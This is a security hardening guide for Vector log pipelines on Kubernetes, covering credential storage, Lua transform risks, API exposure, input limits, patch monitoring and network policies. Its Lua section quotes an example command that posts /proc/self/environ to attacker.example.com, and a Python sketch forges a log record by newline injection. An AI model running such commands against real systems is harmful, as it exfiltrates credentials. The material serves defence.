Vector Log Pipeline Security
Problem
Vector is a high-performance, open source observability data pipeline written in Rust and maintained primarily by Datadog engineers at github.com/vectordotdev/vector. It collects logs, metrics, and traces from sources (Kubernetes pod logs via the kubernetes_logs source, systemd journals, HTTP POST endpoints, syslog, Kafka, and dozens of others), applies transforms (parse, filter, enrich, deduplicate, sample), and routes the resulting events to sinks such as Elasticsearch, Splunk, Datadog’s ingestion API, Amazon S3, and Kafka. Its Rust foundation gives it memory safety guarantees and high throughput, which has made it a common replacement for Fluentd and Logstash in Kubernetes-native observability stacks. That adoption, combined with its privileged position as a DaemonSet reading every pod log on each node, makes Vector a valuable target.
The security surface of a Vector deployment is larger than it initially appears. Vector sources accept arbitrary data from external systems. A crafted log line that triggers an edge case in Vector’s JSON parsing, regex-based parsing, or multiline-aggregation logic can crash the Vector process, cause it to spin consuming CPU, or produce unexpected events downstream. Log injection, meaning embedded newlines or structured data that Vector interprets as separate events, is a persistent class of problem across all log shippers, and Vector is not immune.
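To make the injection mechanics concrete, the following minimal sketch models a line-delimited source in Python. The logger functions and the payload are hypothetical and stand in for an application that writes logs Vector later reads; nothing here is Vector code.

```python
import json

def naive_line(user_input: str) -> str:
    # Hypothetical application logger that interpolates input verbatim.
    return f"level=info msg=login user={user_input}"

def safe_line(user_input: str) -> str:
    # JSON-encoding the record escapes the newline inside the string value.
    return json.dumps({"level": "info", "msg": "login", "user": user_input})

def split_events(stream: str) -> list[str]:
    # Stand-in for a line-delimited source: one event per non-empty line.
    return [line for line in stream.split("\n") if line]

# Attacker-controlled username carrying a forged second log record.
payload = "alice\nlevel=critical msg=admin_granted user=mallory"

print(len(split_events(naive_line(payload))))  # two events, one of them forged
print(len(split_events(safe_line(payload))))   # a single event
```

The forged second event is indistinguishable from a genuine one once it reaches a sink, which is why escaping at the producer is preferable to cleaning up in the pipeline.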
The lua transform is Vector’s escape hatch for logic that VRL (Vector Remap Language) cannot express. It embeds a Lua interpreter inside the Vector process. That interpreter runs in the same OS process as Vector, so scripts inherit Vector’s user and privileges, its open file descriptors, its environment variables, and the credentials that Vector loaded at startup. By default, Lua’s standard library, including os.execute(), io.open(), and require(), is available to Lua scripts running inside a Vector transform. A lua transform that calls os.execute("curl -d @/proc/self/environ attacker.example.com") will exfiltrate all environment variables, including every credential Vector loaded, and will do so without any output in Vector’s own metrics or logs unless the operator has instrumented for unexpected egress.
Vector’s configuration file — typically vector.toml or a directory of TOML fragments mounted as a Kubernetes ConfigMap — routinely contains plaintext credentials in sink definitions. A Datadog API key appears directly in [sinks.datadog_logs], an Elasticsearch password appears in [sinks.es], and an S3 access key appears in [sinks.s3]. Because these are stored in ConfigMaps, any pod in the cluster that can read ConfigMaps in Vector’s namespace (or that has cluster-admin via a misconfigured ClusterRoleBinding) can extract every sink credential Vector holds. The ConfigMap is also readable by anyone with kubectl access to the namespace and no RBAC restriction on ConfigMap reads.
Vector’s HTTP source and its built-in management API introduce network-accessible endpoints. The HTTP source receives log events over plain HTTP or HTTPS and, when configured with bearer token authentication, relied on a non-constant-time string comparison for token validation in versions before the fix committed under “use constant-time comparison for HTTP auth token.” A timing oracle in bearer token comparison allows an attacker on the same network segment to brute-force the token character by character. The Vector API ([api] stanza, default port 8686) exposes runtime configuration introspection and, in some builds, tap functionality that streams live events — if not restricted to localhost, this is an unauthenticated window into your log stream.
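The timing oracle can be illustrated outside Vector. The sketch below is plain Python, not Vector's implementation: it contrasts an early-exit comparison with the standard library's hmac.compare_digest. The helper names are hypothetical.

```python
import hmac

def chars_inspected(supplied: str, expected: str) -> int:
    # Counts how many characters an early-exit loop examines before returning.
    # The count grows with the length of the correct prefix, which is the leak.
    inspected = 0
    for a, b in zip(supplied, expected):
        inspected += 1
        if a != b:
            break
    return inspected

def naive_equal(supplied: str, expected: str) -> bool:
    # Early-exit comparison: running time depends on where the first mismatch is.
    return len(supplied) == len(expected) and chars_inspected(supplied, expected) == len(expected) and supplied[-1:] == expected[-1:]

def constant_time_equal(supplied: str, expected: str) -> bool:
    # compare_digest takes time independent of where the inputs differ.
    return hmac.compare_digest(supplied.encode(), expected.encode())

print(chars_inspected("zbcd", "abcd"))  # stops at the first character
print(chars_inspected("abcz", "abcd"))  # runs to the last character
```

An attacker who can measure the difference between those two cases learns one character per round of guesses, reducing the search from exponential to linear in the token length.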
The development model introduces a specific class of supply-chain risk worth understanding in detail. Because Vector is principally developed by Datadog engineers, security-relevant changes frequently originate as internal pull requests that become public the moment they are merged to the vectordotdev/vector repository on GitHub — before any release is cut. The patch for Lua stdlib restriction was titled “restrict lua stdlib access” and was visible in the public PR diff for approximately ten days before the corresponding Vector release. The constant-time auth token comparison fix appeared as a commit message in the public repository without a CVE being filed. In both cases, an operator monitoring the GitHub commit feed for security-relevant keywords would see the fix before receiving any notification through the Vector release channel. Separately, Vector’s dependency tree — tokio, hyper, openssl bindings — has accumulated CVEs where the lag between upstream CVE publication and a Vector release containing the patched dependency has run two to three weeks. During that window, cargo audit against Vector’s Cargo.lock (available in the Vector Docker image) will surface the vulnerability; the Vector release notes may not mention it explicitly.
To track silent fixes before they become releases, run gh api repos/vectordotdev/vector/commits --jq '.[] | select(.commit.message | test("security|auth|lua|cve|fix.*inject"; "i"))' on a scheduled basis, subscribe to https://github.com/vectordotdev/vector/releases via GitHub’s release notification feed, and use Renovate or Dependabot to watch the Vector container image digest in your Helm chart or DaemonSet manifest. Combine this with cargo audit in your CI pipeline against Vector’s pinned Cargo.lock to catch transitive dependency CVEs before they reach production.
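As a rough sketch of what that keyword filter does, the Python below applies the same case-insensitive pattern to commit objects shaped like the GitHub commits API response. The sample commits and SHAs are invented for illustration.

```python
import re

# Same alternation as the jq test() expression, matched case-insensitively.
PATTERN = re.compile(r"security|auth|lua|cve|fix.*inject", re.IGNORECASE)

def flag_commits(commits):
    flagged = []
    for c in commits:
        message = c["commit"]["message"]
        if PATTERN.search(message):
            # Keep a short SHA and the subject line for the report.
            flagged.append({"sha": c["sha"][:8], "subject": message.splitlines()[0]})
    return flagged

# Hypothetical sample data, not real Vector commits.
SAMPLE = [
    {"sha": "aaaaaaaa1111", "commit": {"message": "enhancement(lua transform): restrict stdlib"}},
    {"sha": "bbbbbbbb2222", "commit": {"message": "docs: fix typo in README"}},
    {"sha": "cccccccc3333", "commit": {"message": "chore: evaluate new benchmark harness"}},
    {"sha": "dddddddd4444", "commit": {"message": "chore(deps): bump tokio"}},
]

for hit in flag_commits(SAMPLE):
    print(hit["sha"], hit["subject"])
```

The third sample is flagged only because "evaluate" contains "lua", so expect false positives from substring matches and treat the output as a triage queue rather than an alert.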
Target systems: Vector 0.38+, Kubernetes DaemonSet deployment, Lua transform (if used).
Threat Model
- Log injection attacker crafts a malicious log line (oversized JSON, a line containing embedded newlines that splits into multiple events, or a string that triggers backtracking in Vector’s regex-based multiline detection) to crash the Vector DaemonSet pod, cause it to drop subsequent log events, or produce spurious events that pollute downstream security analytics.
- Insider or supply chain attacker adds or modifies a lua transform in the Vector ConfigMap. Because lua transforms run with full Lua standard library access by default, a malicious transform can call os.execute() to spawn a shell, read /proc/self/environ to capture all credentials Vector loaded, and exfiltrate data to an external endpoint, all while appearing to function normally from Vector’s own perspective.
- Patch-gap attacker monitors the vectordotdev/vector GitHub repository for commits with messages matching fix lua, fix auth, constant-time, or similar security-relevant patterns. When such a commit appears, they identify Vector deployments still running the unfixed version. These are particularly high-value because a Vector DaemonSet reads logs from every pod on every node, making it a comprehensive source of credentials, tokens, and sensitive data logged accidentally by applications. The attacker has a window of days to weeks between the public patch and operator-initiated upgrades.
- Credential extraction attacker gains read access to Vector’s Kubernetes ConfigMap (through a compromised pod’s service account, a misconfigured RBAC ClusterRoleBinding, or direct kubectl access) and reads plaintext Datadog API keys, Elasticsearch passwords, or S3 access keys from the sinks stanzas of the mounted vector.toml.
The blast radius of a compromised Vector DaemonSet is severe: a single compromised Vector pod reads the logs of every container on its node, holds credentials for every configured sink, and may have egress to production data stores (Elasticsearch, S3) that application pods cannot directly reach. A supply-chain attack against Vector’s Lua transform, or exploitation of an unpatched CVE in the window between public patch and upgrade, results in full exfiltration of the log stream plus all sink credentials from the entire cluster.
Configuration / Implementation
Credential Management
Remove all plaintext credentials from vector.toml and the Kubernetes ConfigMap. Vector 0.38+ supports the SECRET[<backend>.<key>] syntax for delegating secret resolution to a configured secret backend (for example, an external provider process), and also supports standard ${ENV_VAR} interpolation at startup.
# vector.toml — credentials via environment variable interpolation
[sinks.datadog_logs]
type = "datadog_logs"
inputs = ["parse_json"]
default_api_key = "${DATADOG_API_KEY}"
site = "datadoghq.com"
[sinks.elasticsearch]
type = "elasticsearch"
inputs = ["parse_json"]
endpoints = ["https://es.internal:9200"]
auth.strategy = "basic"
auth.user = "${ES_USERNAME}"
auth.password = "${ES_PASSWORD}"
Mount credentials as environment variables from a Kubernetes Secret, not from the ConfigMap:
# vector-daemonset.yaml (env section)
env:
  - name: DATADOG_API_KEY
    valueFrom:
      secretKeyRef:
        name: vector-credentials
        key: datadog-api-key
  - name: ES_USERNAME
    valueFrom:
      secretKeyRef:
        name: vector-credentials
        key: elasticsearch-username
  - name: ES_PASSWORD
    valueFrom:
      secretKeyRef:
        name: vector-credentials
        key: elasticsearch-password
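Scope ConfigMap access with a namespaced Role bound only to the Vector ServiceAccount, and audit existing RoleBindings and ClusterRoleBindings so that no other subject can read ConfigMaps or Secrets in the Vector namespace. RBAC is additive, so this Role grants access but does not revoke broader grants made elsewhere:
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: vector-config-reader
  namespace: vector
rules:
  - apiGroups: [""]
    resources: ["configmaps"]
    resourceNames: ["vector-config"]
    # list and watch honour resourceNames only when the client sets a
    # metadata.name field selector, so grant get alone
    verbs: ["get"]
# Secrets are accessed via env var injection, so no Secret read permission is needed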
Never grant get on Secrets to the Vector ServiceAccount unless using the SECRET[] provider pattern, which requires a dedicated sidecar process with its own narrowly-scoped Secret permissions.
Lua Transform Hardening
Audit your Vector configuration for any lua transform:
grep -rn "type.*=.*\"lua\"" /etc/vector/
If lua transforms exist and cannot be replaced, explicitly strip the dangerous standard library modules at the top of every Lua script. Treat this as defence in depth rather than a complete sandbox, since anyone who can edit the transform can also remove these lines:
[transforms.safe_lua]
type = "lua"
inputs = ["raw_logs"]
version = "2"
hooks.process = """
function (event, emit)
  -- Disable dangerous stdlib access at script entry
  os = nil
  io = nil
  debug = nil
  require = nil
  package = nil
  load = nil
  loadstring = nil
  loadfile = nil
  dofile = nil
  -- Safe processing logic only below this line
  event.log.processed = true
  emit(event)
end
"""
The preferred alternative is VRL (Vector Remap Language). VRL programs are compiled and type-checked when Vector starts, and the language provides no functions for executing processes or opening arbitrary files or sockets:
[transforms.parse_and_enrich]
type = "remap"
inputs = ["raw_logs"]
source = """
# Parse JSON log body
. = parse_json!(string!(.message))
# Enrich with cluster metadata
.cluster = "prod-us-east-1"
.pipeline_version = "2.4.0"
# Drop events that are not structured as expected
if !exists(.level) || !exists(.timestamp) {
abort
}
"""
Establish a code review gate: any change to a lua transform in the Vector ConfigMap must pass a security review before deployment, enforced through your GitOps workflow (e.g., a CODEOWNERS entry requiring approval from the security team for changes to any file matching *vector*.toml or *vector*/*.toml).
HTTP Source Authentication and API Hardening
[sources.http_receiver]
type = "http_server"
address = "0.0.0.0:8080"
tls.enabled = true
tls.crt_file = "/etc/vector/tls/tls.crt"
tls.key_file = "/etc/vector/tls/tls.key"
auth.strategy = "bearer"
auth.token = "${HTTP_SOURCE_TOKEN}"
# Disable the Vector management API in production
[api]
enabled = false
If the API must be enabled for debugging, bind it to localhost only and never expose it via a Service:
[api]
enabled = true
address = "127.0.0.1:8686"
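The same configuration audit can verify the API binding. This is a small sketch using Python's ipaddress module; it takes the parsed [api] table as a dictionary, and the fallback address used when none is set is an assumption of the example rather than a statement about Vector's defaults.

```python
import ipaddress

def api_is_loopback_only(api: dict) -> bool:
    """True when the API is disabled or bound to a loopback address."""
    if not api.get("enabled", False):
        return True
    # Fallback value is an assumption for this sketch.
    address = api.get("address", "127.0.0.1:8686")
    host, _, _port = address.rpartition(":")
    host = host.strip("[]")  # allow bracketed IPv6 such as [::1]:8686
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Not an IP literal; accept only the conventional loopback name.
        return host == "localhost"

print(api_is_loopback_only({"enabled": True, "address": "0.0.0.0:8686"}))
print(api_is_loopback_only({"enabled": True, "address": "127.0.0.1:8686"}))
```

Failing the build on a non-loopback binding keeps a temporary debugging change from reaching production unnoticed.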
Apply a NetworkPolicy restricting ingress to the HTTP source port to known log-producing namespaces or pods only:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: vector-http-source-ingress
  namespace: vector
spec:
  podSelector:
    matchLabels:
      app: vector
  policyTypes:
    - Ingress
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: app-production
      ports:
        - protocol: TCP
          port: 8080
Source Input Validation
Use a filter transform to drop oversized events before they reach parsing transforms, and a throttle transform to bound the event rate per source:
[transforms.drop_oversized]
type = "filter"
inputs = ["kubernetes_logs"]
condition = """
length(string!(.message)) <= 65536
"""
[transforms.rate_limit]
type = "throttle"
inputs = ["drop_oversized"]
threshold = 10000
window_secs = 1.0
# key_field is a template; a bare path would be treated as one constant key
key_field = "{{ kubernetes.pod_name }}"
[transforms.parse_json]
type = "remap"
inputs = ["rate_limit"]
source = """
parsed, err = parse_json(.message)
if err != null {
  # Tag unparseable events so a downstream route can send them to a
  # dead-letter sink rather than dropping them
  .parse_error = err
  .raw_message = .message
} else {
  . = merge!(., parsed)
}
"""
Monitoring Vector for Silent Fixes
Add cargo audit to your CI pipeline by extracting Vector’s Cargo.lock from the official Docker image and auditing it:
#!/usr/bin/env bash
# check-vector-vulns.sh
set -euo pipefail
VECTOR_IMAGE="timberio/vector:0.38.0-debian"
docker pull "${VECTOR_IMAGE}"
docker create --name vector-audit "${VECTOR_IMAGE}" /bin/true
docker cp vector-audit:/usr/share/doc/vector/Cargo.lock ./vector-Cargo.lock
docker rm vector-audit
cargo audit --file ./vector-Cargo.lock --json | \
  jq -e '.vulnerabilities.list | length == 0' || \
  { echo "Vector dependency CVEs found; review before deployment"; exit 1; }
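When the job fails, a readable summary of the findings speeds up triage. The sketch below assumes the JSON report nests findings under vulnerabilities.list with advisory, package, and versions.patched fields; verify that shape against the cargo-audit version you run. The sample advisory ID and crate name are placeholders, not real advisories.

```python
import json

def summarize_audit(report: dict) -> list[str]:
    """Turn a cargo-audit style JSON report into one line per finding."""
    lines = []
    for item in report.get("vulnerabilities", {}).get("list", []):
        advisory = item.get("advisory", {})
        package = item.get("package", {})
        patched = item.get("versions", {}).get("patched", [])
        fixed = ", ".join(patched) or "none listed"
        lines.append(
            f"{advisory.get('id', '?')} {package.get('name', '?')} "
            f"{package.get('version', '?')} patched in: {fixed}"
        )
    return lines

# Placeholder report for illustration only.
SAMPLE = json.loads("""
{
  "vulnerabilities": {
    "found": true,
    "count": 1,
    "list": [
      {
        "advisory": {"id": "RUSTSEC-0000-0000", "title": "placeholder advisory"},
        "package": {"name": "examplecrate", "version": "1.2.3"},
        "versions": {"patched": [">=1.2.4"]}
      }
    ]
  }
}
""")

for line in summarize_audit(SAMPLE):
    print(line)
```

Using .get() throughout means an unexpected report shape yields an empty or partial summary instead of a crash, which is preferable inside a CI step whose main signal is the exit code of the audit itself.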
Monitor the Vector GitHub commit feed for security-relevant changes on a schedule:
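# Run daily via CI or cron. Limit the query to recent commits so that
# --paginate does not walk the entire repository history (GNU date syntax).
SINCE="$(date -u -d '1 day ago' +%Y-%m-%dT%H:%M:%SZ)"
gh api --method GET repos/vectordotdev/vector/commits \
  -f since="${SINCE}" \
  --paginate \
  --jq '.[] | select(.commit.message | test("security|auth|lua|cve|fix.*inject|timing|constant.time|sanitize|escape"; "i")) | {sha: .sha[0:8], message: .commit.message, date: .commit.author.date}'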
In your Helm values or Kustomize overlay, pin Vector to an image digest and use Renovate to open PRs when the digest changes:
# renovate.json
{
  "packageRules": [
    {
      "matchPackageNames": ["timberio/vector"],
      "matchUpdateTypes": ["digest", "minor", "patch"],
      "automerge": false,
      "reviewers": ["team:security"]
    }
  ]
}
Network Isolation
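Restrict Vector DaemonSet egress to the ports and destinations its sinks need. A standard NetworkPolicy matches IP blocks, not hostnames, so the Datadog rule below still permits HTTPS to any public address; narrowing it to specific hostnames requires a CNI that supports FQDN-based policies or an egress proxy. The Kubernetes API address 10.96.0.1 is a common default and should be replaced with the ClusterIP of the kubernetes Service in your cluster:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: vector-egress-restrict
  namespace: vector
spec:
  podSelector:
    matchLabels:
      app: vector
  policyTypes:
    - Egress
  egress:
    # Datadog logs ingestion (any public IP on 443; private ranges excluded)
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 10.0.0.0/8
              - 172.16.0.0/12
              - 192.168.0.0/16
      ports:
        - protocol: TCP
          port: 443
    # Internal Elasticsearch
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: elasticsearch
      ports:
        - protocol: TCP
          port: 9200
    # Kubernetes API (for pod metadata enrichment)
    - to:
        - ipBlock:
            cidr: 10.96.0.1/32
      ports:
        - protocol: TCP
          port: 443
    # CoreDNS (TCP is needed for responses too large for UDP)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53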
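The interaction between cidr and except entries is easy to misread, so it helps to evaluate candidate destinations before applying the policy. This sketch models a single ipBlock with Python's ipaddress module; it is a simplified stand-in for how a CNI evaluates the rule, and the public address used is from a documentation range.

```python
import ipaddress

PRIVATE_RANGES = ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")

def ipblock_allows(ip: str, cidr: str, excepts=()) -> bool:
    """True when ip is inside cidr and outside every except range."""
    addr = ipaddress.ip_address(ip)
    if addr not in ipaddress.ip_network(cidr):
        return False
    return not any(addr in ipaddress.ip_network(e) for e in excepts)

# The public-HTTPS rule excludes the API server address...
print(ipblock_allows("10.96.0.1", "0.0.0.0/0", PRIVATE_RANGES))
# ...which is why the policy needs a dedicated /32 rule for it.
print(ipblock_allows("10.96.0.1", "10.96.0.1/32"))
# Any public address is permitted on 443, not only the intended sink.
print(ipblock_allows("203.0.113.10", "0.0.0.0/0", PRIVATE_RANGES))
```

The last case shows the residual exfiltration path: a compromised Vector pod can still reach an arbitrary public host over 443 under this policy.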
Mount the host log directories read-only in the DaemonSet spec:
# Pod spec
volumes:
  - name: varlog
    hostPath:
      path: /var/log
  - name: varlibdockercontainers
    hostPath:
      path: /var/lib/docker/containers
# Vector container spec
volumeMounts:
  - name: varlog
    mountPath: /var/log
    readOnly: true
  - name: varlibdockercontainers
    mountPath: /var/lib/docker/containers
    readOnly: true
Expected Behaviour
| Signal | Default Vector Config | Hardened Config |
|---|---|---|
| Plaintext API key in ConfigMap | Datadog API key visible in kubectl get configmap vector-config -o yaml to any user with ConfigMap read access | API key stored in Kubernetes Secret; ConfigMap contains only ${DATADOG_API_KEY} placeholder; RBAC restricts ConfigMap reads to Vector ServiceAccount only |
| lua transform calling os.execute() | Shell command runs as a child of the Vector process; exit status returned to the Lua script; no Vector-level log entry generated | os table set to nil at script entry; call raises Lua error; event is dropped or routed to error output; alert fires when the configuration audit detects a lua transform |
| HTTP source accessed without valid bearer token | Request accepted if auth stanza is absent; timing side-channel if non-constant-time comparison is used in unfixed version | Constant-time comparison enforced; invalid token returns 401; NetworkPolicy blocks requests from sources outside the allowlist before they reach Vector |
| Upstream CVE in tokio or hyper dependency | Not surfaced until Vector release notes mention it (2–3 week lag typical) | cargo audit CI job extracts Cargo.lock from the Vector image and fails the build pipeline on any known CVE; Renovate opens a PR to update the image digest |
| Log injection via oversized event (>64 KB) | Event passes through to parsing transforms; may cause memory spike or downstream parser error | filter transform drops events exceeding 65,536 bytes before they reach any parsing stage; dropped events counted in component_discarded_events_total metric; alert fires on drop spike |
Trade-offs
| Aspect | Benefit | Cost | Mitigation |
|---|---|---|---|
| VRL over Lua | VRL exposes no process-execution or arbitrary file or socket functions; faster execution; statically analysable | Less expressive than Lua for complex stateful logic; no ability to call external libraries | Cover the large majority of use cases with VRL’s built-in functions; for remaining cases, use a dedicated enrichment service and the http sink/source pattern rather than lua |
| API endpoint disabled (api.enabled = false) | Eliminates unauthenticated tap and introspection surface in production | No runtime visibility into Vector’s internal topology or live event stream during incidents | Enable API on demand via a mutating webhook or temporary ConfigMap patch during incident investigation; use Vector’s Prometheus metrics endpoint for steady-state observability |
| Strict event size limits | Prevents memory exhaustion and parsing DoS from log flood or injection | Legitimate large events (stack traces, structured audit records) may be silently dropped | Route oversized events to a dead-letter Kafka topic rather than dropping; alert on dead-letter queue depth; tune the threshold based on observed p99 event size |
| cargo audit in CI | Surfaces transitive dependency CVEs before they reach production; narrows the patch-gap window | Adds 30–90 seconds to CI build time; may produce false positives for CVEs with no Vector-reachable code path | Cache the cargo-audit binary and advisory database between runs; use --ignore only after documented security review of the specific CVE’s reachability |
Failure Modes
| Failure | Symptom | Detection | Recovery |
|---|---|---|---|
| Secret env var not injected (e.g., Secret deleted or RBAC revoked) | Vector starts but immediately fails to authenticate with the sink; events queue internally and then are dropped when the buffer fills; component_errors_total rises; no data appears in Datadog or Elasticsearch | Alert on component_errors_total{component_id="datadog_logs"} exceeding threshold; alert on absence of Vector heartbeat events in sink | Verify Secret exists and contains the correct key (kubectl get secret vector-credentials -n vector -o jsonpath='{.data}'); re-create Secret and restart Vector DaemonSet pods via rolling restart |
| VRL syntax error in a remap transform | Vector fails to start; DaemonSet pods crash-loop; all log collection on affected nodes stops | Pod restart count alert; kubectl logs shows VRL parse error at startup | Roll back the ConfigMap to the previous version via GitOps; Vector will restart successfully against the last-known-good config |
| NetworkPolicy blocks sink endpoint | Logs are collected and buffered internally; buffer fills; new events are dropped; buffer_discarded_events_total rises; no data appears in sink | Alert on buffer_discarded_events_total; alert on absence of expected log volume in Elasticsearch or Datadog | Review NetworkPolicy egress rules against current sink IPs/CIDRs; update NetworkPolicy to permit the blocked endpoint; consider using a Service with a stable ClusterIP for internal sinks rather than direct IP rules |
| Vector OOM from log flood before throttle kicks in | Vector pod is OOM-killed; DaemonSet restarts the pod; log collection gap on the affected node; OOMKilled in pod events | Alert on pod OOM restarts (kube_pod_container_status_last_terminated_reason{reason="OOMKilled"}); monitor node-level log producer event rates | Lower the throttle threshold; add a filter to drop debug-level events from high-volume namespaces during the flood; set a container memory limit with headroom and keep sink buffers bounded with when_full = "block" so back-pressure reaches sources before memory is exhausted |